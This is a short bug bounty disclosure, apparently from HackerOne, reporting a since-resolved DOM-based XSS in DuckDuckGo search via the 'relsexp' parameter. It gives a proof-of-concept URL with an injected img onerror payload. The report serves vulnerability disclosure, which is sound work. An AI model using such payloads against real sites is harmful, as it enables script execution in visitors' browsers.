DOM XSS on duckduckgo.com search
Medium
D
DuckDuckGo
Submitted None
Actions:
Reported by
cujanovic
Vulnerability Details
Technical details and impact analysis
Hello,
The is a DOM XSS vulnerability on https://duckduckgo.com search through the `relsexp` parameter.
PoC URL: ` https://duckduckgo.com/?q=a&relsexp="><img src=/ onerror=alert(document.domain)>&ia=web`
Screenshot:
{F830875}
Video:
{F830880}
## Impact
The attacker can execute JS code.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected